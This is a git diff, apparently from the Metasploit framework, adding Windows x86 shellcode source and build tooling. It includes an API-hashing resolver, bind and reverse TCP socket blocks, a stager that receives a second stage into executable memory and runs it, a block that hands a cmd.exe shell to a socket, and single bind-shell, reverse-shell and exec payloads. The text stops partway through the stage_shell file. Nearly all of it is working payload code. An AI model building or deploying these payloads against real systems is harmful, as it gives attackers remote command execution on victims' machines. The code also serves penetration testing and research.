diff --git a/external/source/shellcode/windows/x86/bin/single_exec.bin b/external/source/shellcode/windows/x86/bin/single_exec.bin new file mode 100644 index 0000000000..0921c12441 Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/single_exec.bin differ diff --git a/external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin b/external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin new file mode 100644 index 0000000000..baab97f538 Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin differ diff --git a/external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin b/external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin new file mode 100644 index 0000000000..4649fec83f Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin differ diff --git a/external/source/shellcode/windows/x86/bin/stage_shell.bin b/external/source/shellcode/windows/x86/bin/stage_shell.bin new file mode 100644 index 0000000000..9132450780 Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stage_shell.bin differ diff --git a/external/source/shellcode/windows/x86/bin/stage_upexec.bin b/external/source/shellcode/windows/x86/bin/stage_upexec.bin new file mode 100644 index 0000000000..1c3ab9fc4a Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stage_upexec.bin differ diff --git a/external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin b/external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin new file mode 100644 index 0000000000..2343da3f0e Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin differ diff --git a/external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin b/external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin new file mode 100644 index 0000000000..47438d4385 Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin differ diff --git a/external/source/shellcode/windows/x86/build.py b/external/source/shellcode/windows/x86/build.py new file mode 100644 index 0000000000..4526138956 --- /dev/null +++ b/external/source/shellcode/windows/x86/build.py @@ -0,0 +1,98 @@ +#=============================================================================# +# A simple python build script to build the singles/stages/stagers and +# some usefull information such as offsets and a hex dump. The binary output +# will be placed in the bin directory. A hex string and usefull comments will +# be printed to screen. +# +# Example: +# >python build.py stager_reverse_tcp_nx +# +# Example, to build everything: +# >python build.py all > build_output.txt +# +# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +#=============================================================================# +import os, sys, time +from subprocess import Popen +from struct import pack +#=============================================================================# +def clean( dir="./bin/" ): + for root, dirs, files in os.walk( dir ): + for name in files: + os.remove( os.path.join( root, name ) ) +#=============================================================================# +def locate( src_file, dir="./src/" ): + for root, dirs, files in os.walk( dir ): + for name in files: + if src_file == name: + return root + return None +#=============================================================================# +def build( name ): + location = locate( "%s.asm" % name ) + if location: + input = os.path.normpath( os.path.join( location, name ) ) + output = os.path.normpath( os.path.join( "./bin/", name ) ) + p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] ) + p.wait() + xmit( name ) + else: + print "[-] Unable to locate '%s.asm' in the src directory" % name +#=============================================================================# +def xmit_dump_ruby( data, length=16 ): + dump = "" + for i in xrange( 0, len( data ), length ): + bytes = data[ i : i+length ] + hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) ) + if i+length <= len(data): + hex += " +" + dump += "%s\n" % ( hex ) + print dump +#=============================================================================# +def xmit_offset( data, name, value ): + offset = data.find( value ); + if offset != -1: + print "# %s Offset: %d" % ( name, offset ) +#=============================================================================# +def xmit( name, dump_ruby=True ): + bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) ) + f = open( bin, 'rb') + data = f.read() + print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) ) + xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444 + xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1 + xmit_offset( data, "ExitFunk", pack( "]" + else: + print "# Built on %s\n" % ( time.asctime( time.localtime() ) ) + if argv[1] == "clean": + clean() + elif argv[1] == "all": + for root, dirs, files in os.walk( "./src/single/" ): + for name in files: + build( name[:-4] ) + for root, dirs, files in os.walk( "./src/stage/" ): + for name in files: + build( name[:-4] ) + for root, dirs, files in os.walk( "./src/stager/" ): + for name in files: + build( name[:-4] ) + else: + build( argv[1] ) + except Exception, e: + print "[-] ", e +#=============================================================================# +if __name__ == "__main__": + main() +#=============================================================================# \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/block/block_api.asm b/external/source/shellcode/windows/x86/src/block/block_api.asm new file mode 100644 index 0000000000..2acc13ddec --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_api.asm @@ -0,0 +1,97 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] + +; Input: The hash of the API to call and all its parameters must be pushed onto stack. +; Output: The return value from the API call will be in EAX. +; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention) +; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered. +; Note: This function assumes the direction flag has allready been cleared via a CLD instruction. +; Note: This function is unable to call forwarded exports. + +api_call: + pushad ; We preserve all the registers for the caller, bar EAX and ECX. + mov ebp, esp ; Create a new stack frame + xor edx, edx ; Zero EDX + mov edx, [fs:edx+48] ; Get a pointer to the PEB + mov edx, [edx+12] ; Get PEB->Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list +next_mod: ; + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name +loop_modname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase +not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop untill we have read enough + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to itterate the export address table, + mov edx, [edx+16] ; Get this modules base address + mov eax, [edx+60] ; Get PE header + add eax, edx ; Add the modules base address + mov eax, [eax+120] ; Get export tables RVA + test eax, eax ; Test if no export address table is present + jz get_next_mod1 ; If no EAT present, process the next module + add eax, edx ; Add the modules base address + push eax ; Save the current modules EAT + mov ecx, [eax+24] ; Get the number of function names + mov ebx, [eax+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + ; Computing the module hash + function hash +get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the one we want +loop_funcname: ; + xor eax, eax ; Clear EAX + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + ; If found, fix up stack, call the function and then value else compute the next one... + pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... +finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... +get_next_mod: ; + pop eax ; Pop off the current (now the previous) modules EAT +get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp short next_mod ; Process this module \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm new file mode 100644 index 0000000000..cad1aaba86 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm @@ -0,0 +1,63 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the newly connected clients socket +; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) + +bind_tcp: + push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. + push 0x5F327377 ; ... + push esp ; Push a pointer to the "ws2_32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "ws2_32" ) + + mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) + sub esp, eax ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push eax ; push the wVersionRequested parameter + push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call ebp ; WSAStartup( 0x0190, &WSAData ); + + push eax ; if we succeed, eax wil be zero, push zero for the flags param. + push eax ; push null for reserved parameter + push eax ; we do not specify a WSAPROTOCOL_INFO structure + push eax ; we do not specify a protocol + inc eax ; + push eax ; push SOCK_STREAM + inc eax ; + push eax ; push AF_INET + push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + mov edi, eax ; save the socket for later + + xor ebx, ebx ; Clear EBX + push ebx ; bind to 0.0.0.0 + push 0x5C110002 ; family AF_INET and port 4444 + mov esi, esp ; save a pointer to sockaddr_in struct + push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused) + push esi ; pointer to the sockaddr_in struct + push edi ; socket + push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" ) + call ebp ; bind( s, &sockaddr_in, 16 ); + + push ebx ; backlog + push edi ; socket + push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" ) + call ebp ; listen( s, 0 ); + + push ebx ; we set length for the sockaddr struct to zero + push ebx ; we dont set the optional sockaddr param + push edi ; listening socket + push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" ) + call ebp ; accept( s, 0, 0 ); + + push edi ; push the listening socket to close + mov edi, eax ; swap the new connected socket over the listening socket + push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" ) + call ebp ; closesocket( s ); + \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm b/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm new file mode 100644 index 0000000000..2e4d01a992 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm @@ -0,0 +1,52 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +; Size: 31 bytes +;-----------------------------------------------------------------------------; +; kernel32.dll!SetUnhandledExceptionFilter (0xEA320EFE) - This exit function +; will let the UnhandledExceptionFilter function perform its default handling +; routine. +; +; kernel32.dll!ExitProcess (0x56A2B5F0) - This exit function will force the +; process to terminate. +; +; kernel32.dll!ExitThread (0x0A2A1DE0) - This exit function will force the +; current thread to terminate. On Windows 2008, Vista and 7 this function is +; a forwarded export to ntdll.dll!RtlExitUserThread and as such cannot be +; called by the api_call function. +; +; ntdll.dll!RtlExitUserThread (0x6F721347) - This exit function will force +; the current thread to terminate. This function is not available on Windows +; NT or 2000. +;-----------------------------------------------------------------------------; +; Windows 7 6.1 +; Windows Server 2008 R2 6.1 If the EXITFUNK is ExitThread we must call +; Windows Server 2008 6.0 RtlExitUserThread instead. +; Windows Vista 6.0 _______________________________________________ +; Windows Server 2003 R2 5.2 +; Windows Server 2003 5.2 +; Windows XP 5.1 +; Windows 2000 5.0 +; Windows NT4 4.0 +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: None. +; Clobbers: EAX, EBX, (ESP will also be modified) +; Note: Execution is not expected to (successfully) continue past this block + +exitfunk: + mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user... + push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" ) + call ebp ; GetVersion(); (AL will = major version and AH will = minor version) + cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7 + jl short goodbye ; Then just call the exit function... + cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... + jne short goodbye ; + mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread +goodbye: ; We now perform the actual call to the exit function + push byte 0 ; push the exit function parameter + push ebx ; push the hash of the exit function + call ebp ; call EXITFUNK( 0 ); diff --git a/external/source/shellcode/windows/x86/src/block/block_recv.asm b/external/source/shellcode/windows/x86/src/block/block_recv.asm new file mode 100644 index 0000000000..a821bf5714 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_recv.asm @@ -0,0 +1,44 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Compatible: block_bind_tcp, block_reverse_tcp + +; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack. +; Output: None. +; Clobbers: EAX, EBX, ESI, (ESP will also be modified) + +recv: + ; Receive the size of the incoming second stage... + push byte 0 ; flags + push byte 4 ; length = sizeof( DWORD ); + push esi ; the 4 byte buffer on the stack to hold the second stage length + push edi ; the saved socket + push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" ) + call ebp ; recv( s, &dwLength, 4, 0 ); + ; Alloc a RWX buffer for the second stage + mov esi, [esi] ; dereference the pointer to the second stage length + push byte 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push esi ; push the newly recieved second stage length. + push byte 0 ; NULL as we dont care where the allocation is. + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + ; Receive the second stage and execute it... + mov ebx, eax ; ebx = our new memory address for the new stage + push ebx ; push the address of the new stage so we can return into it +read_more: ; + push byte 0 ; flags + push esi ; length + push ebx ; the current address into our second stages RWX buffer + push edi ; the saved socket + push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" ) + call ebp ; recv( s, buffer, length, 0 ); + add ebx, eax ; buffer += bytes_received + sub esi, eax ; length -= bytes_received + test esi, esi ; test length + jnz read_more ; continue if we have more to read + ret ; return into the second stage \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm new file mode 100644 index 0000000000..da3b03d14b --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm @@ -0,0 +1,45 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. +; Output: EDI will be the socket for the connection to the server +; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) + +reverse_tcp: + push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. + push 0x5F327377 ; ... + push esp ; Push a pointer to the "ws2_32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "ws2_32" ) + + mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) + sub esp, eax ; alloc some space for the WSAData structure + push esp ; push a pointer to this stuct + push eax ; push the wVersionRequested parameter + push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" ) + call ebp ; WSAStartup( 0x0190, &WSAData ); + + push eax ; if we succeed, eax wil be zero, push zero for the flags param. + push eax ; push null for reserved parameter + push eax ; we do not specify a WSAPROTOCOL_INFO structure + push eax ; we do not specify a protocol + inc eax ; + push eax ; push SOCK_STREAM + inc eax ; + push eax ; push AF_INET + push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" ) + call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); + mov edi, eax ; save the socket for later + + push 0x0100007F ; host 127.0.0.1 + push 0x5C110002 ; family AF_INET and port 4444 + mov esi, esp ; save pointer to sockaddr struct + push byte 16 ; length of the sockaddr struct + push esi ; pointer to the sockaddr struct + push edi ; the socket + push 0x6174A599 ; hash( "ws2_32.dll", "connect" ) + call ebp ; connect( s, &sockaddr, 16 ); \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/block/block_shell.asm b/external/source/shellcode/windows/x86/src/block/block_shell.asm new file mode 100644 index 0000000000..359da6ae6a --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_shell.asm @@ -0,0 +1,49 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (24 July 2009) +;-----------------------------------------------------------------------------; +[BITS 32] + +; Input: EBP must be the address of 'api_call'. EDI must be a socket. +; Output: None. +; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified + +shell: + push 0x00646D63 ; push our command line: 'cmd',0 + mov ebx, esp ; save a pointer to the command line + push edi ; our socket becomes the shells hStdError + push edi ; our socket becomes the shells hStdOutput + push edi ; our socket becomes the shells hStdInput + xor esi, esi ; Clear ESI for all the NULL's we need to push + push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack + pop ecx ; Set ECX for the loop +push_loop: ; + push esi ; push a null dword + loop push_loop ; keep looping untill we have pushed enough nulls + mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW + lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure + mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure + ; perform the call to CreateProcessA + push esp ; Push the pointer to the PROCESS_INFORMATION Structure + push eax ; Push the pointer to the STARTUPINFO Structure + push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent + push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent + push esi ; We dont specify any dwCreationFlags + inc esi ; Increment ESI to be one + push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent + dec esi ; Decrement ESI back down to zero + push esi ; Set lpThreadAttributes to NULL + push esi ; Set lpProcessAttributes to NULL + push ebx ; Set the lpCommandLine to point to "cmd",0 + push esi ; Set lpApplicationName to NULL as we are using the command line param instead + push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" ) + call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi ); + ; perform the call to WaitForSingleObject + mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure + dec esi ; Decrement ESI down to -1 (INFINITE) + push esi ; push INFINITE inorder to wait forever + inc esi ; Increment ESI back to zero + push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess + push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" ) + call ebp ; WaitForSingleObject( pi.hProcess, INFINITE ); \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/hash.py b/external/source/shellcode/windows/x86/src/hash.py new file mode 100644 index 0000000000..18ba57afac --- /dev/null +++ b/external/source/shellcode/windows/x86/src/hash.py @@ -0,0 +1,146 @@ +#=============================================================================# +# This script can detect hash collisions between exported API functions in +# multiple modules by either scanning a directory tree or just a single module. +# This script can also just output the correct hash value for any single API +# function for use with the 'api_call' function in 'block_api.asm'. +# +# Example: Detect fatal collisions against all modules in the C drive: +# >hash.py /dir c:\ +# +# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\') +# >hash.py /mod c:\windows\system32\ kernel32.dll +# +# Example: Simply print the correct hash value for the function kernel32.dll!WinExec +# >hash.py kernel32.dll WinExec +# +# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +#=============================================================================# +from sys import path +import os, time, sys + +# Modify this path to pefile to suit your machine... +pefile_path = "D:\\Development\\Frameworks\\pefile\\" + +path.append( pefile_path ) +import pefile +#=============================================================================# +collisions = [ ( 0x006B8029, "ws2_32.dll!WSAStartup" ), + ( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ), + ( 0x6737DBC2, "ws2_32.dll!bind" ), + ( 0xFF38E9B7, "ws2_32.dll!listen" ), + ( 0xE13BEC74, "ws2_32.dll!accept" ), + ( 0x614D6E75, "ws2_32.dll!closesocket" ), + ( 0x6174A599, "ws2_32.dll!connect" ), + ( 0x5FC8D902, "ws2_32.dll!recv" ), + ( 0x5F38EBC2, "ws2_32.dll!send" ), + + ( 0x5BAE572D, "kernel32.dll!WriteFile" ), + ( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ), + ( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ), + ( 0xE449F330, "kernel32.dll!GetTempPathA" ), + ( 0x528796C6, "kernel32.dll!CloseHandle" ), + ( 0x863FCC79, "kernel32.dll!CreateProcessA" ), + ( 0xE553A458, "kernel32.dll!VirtualAlloc" ), + ( 0x300F2F0B, "kernel32.dll!VirtualFree" ), + ( 0x0726774C, "kernel32.dll!LoadLibraryA" ), + ( 0x7802F749, "kernel32.dll!GetProcAddress" ), + ( 0x601D8708, "kernel32.dll!WaitForSingleObject" ), + ( 0x876F8B31, "kernel32.dll!WinExec" ), + ( 0x9DBD95A6, "kernel32.dll!GetVersion" ), + ( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ), + ( 0x56A2B5F0, "kernel32.dll!ExitProcess" ), + ( 0x0A2A1DE0, "kernel32.dll!ExitThread" ), + + ( 0x6F721347, "ntdll.dll!RtlExitUserThread" ), + + ( 0x23E38427, "advapi32.dll!RevertToSelf" ) + ] + +collisions_detected = {} +modules_scanned = 0 +functions_scanned = 0 +#=============================================================================# +def ror( dword, bits ): + return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF +#=============================================================================# +def unicode( string, uppercase=True ): + result = ""; + if uppercase: + string = string.upper() + for c in string: + result += c + "\x00" + return result +#=============================================================================# +def hash( module, function, bits=13, print_hash=True ): + module_hash = 0 + function_hash = 0 + for c in unicode( module + "\x00" ): + module_hash = ror( module_hash, bits ) + module_hash += ord( c ) + for c in str( function + "\x00" ): + function_hash = ror( function_hash, bits ) + function_hash += ord( c ) + h = module_hash + function_hash & 0xFFFFFFFF + if print_hash: + print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function ) + return h +#=============================================================================# +def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ): + global modules_scanned + global functions_scanned + try: + dll_name = dll_name.lower() + modules_scanned += 1 + pe = pefile.PE( os.path.join( dll_path, dll_name ) ) + for export in pe.DIRECTORY_ENTRY_EXPORT.symbols: + if export.name is None: + continue + h = hash( dll_name, export.name, print_hash=print_hashes ) + for ( col_hash, col_name ) in collisions: + if col_hash == h and col_name != "%s!%s" % (dll_name, export.name): + if h not in collisions_detected.keys(): + collisions_detected[h] = [] + collisions_detected[h].append( (dll_path, dll_name, export.name) ) + break + functions_scanned += 1 + except: + pass +#=============================================================================# +def scan_directory( dir ): + for dot, dirs, files in os.walk( dir ): + for file_name in files: + if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe": + scan( dot, file_name ) + print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) ) + for h in collisions_detected.keys(): + for (col_hash, col_name ) in collisions: + if h == col_hash: + detected_name = col_name + break + print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name ) + for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]: + print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path ) + print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned ) +#=============================================================================# +def main( argv=None ): + if not argv: + argv = sys.argv + try: + if len( argv ) == 1: + print "Usage: hash.py [/dir ] | [/mod ] | [ ]" + else: + print "[+] Ran on %s\n" % ( time.asctime( time.localtime() ) ) + if argv[1] == "/dir": + print "[+] Scanning directory '%s' for collisions..." % argv[2] + scan_directory( argv[2] ) + elif argv[1] == "/mod": + print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] ) + scan( argv[2], argv[3], print_hashes=True ) + else: + hash( argv[1], argv[2] ) + except Exception, e: + print "[-] ", e +#=============================================================================# +if __name__ == "__main__": + main() +#=============================================================================# \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_exec.asm b/external/source/shellcode/windows/x86/src/single/single_exec.asm new file mode 100644 index 0000000000..bacbff30ae --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_exec.asm @@ -0,0 +1,26 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 191 bytes + strlen(command) + 1 +; Build: >build.py single_exec +;-----------------------------------------------------------------------------; + +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +delta: ; +%include "./src/block/block_api.asm" ; +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. + push byte +1 ; + lea eax, [ebp+command-delta] + push eax ; + push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" ) + call ebp ; WinExec( &command, 1 ); + ; Finish up with the EXITFUNK. +%include "./src/block/block_exitfunk.asm" +command: + ;db "calc.exe", 0 \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm new file mode 100644 index 0000000000..fdc5dfe93f --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm @@ -0,0 +1,20 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 341 bytes +; Build: >build.py single_shell_bind_tcp +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. +%include "./src/block/block_bind_tcp.asm" + ; By here we will have performed the bind_tcp connection and EDI will be out socket. +%include "./src/block/block_shell.asm" + ; Finish up with the EXITFUNK. +%include "./src/block/block_exitfunk.asm" \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm b/external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm new file mode 100644 index 0000000000..276cc8aa04 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm @@ -0,0 +1,20 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 314 bytes +; Build: >build.py single_shell_reverse_tcp +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; Pop off the address of 'api_call' for calling later. +%include "./src/block/block_reverse_tcp.asm" + ; By here we will have performed the reverse_tcp connection and EDI will be out socket. +%include "./src/block/block_shell.asm" + ; Finish up with the EXITFUNK. +%include "./src/block/block_exitfunk.asm" \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/stage/stage_shell.asm b/external/source/shellcode/windows/x86/src/stage/stage_shell.asm new file mode 100644 index 0000000000..8e2865d27b --- /dev/null +++ b/external/source/shellcode/windows/x86/src/stage/stage_shell.asm @@ -0,0 +1,22 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 240 bytes +; Build: >build.py stage_shell +;-----------------------------------------------------------------------------; +[BITS 32] +[ORG 0] + +; By here EDI will be our socket and EBP will be the address of 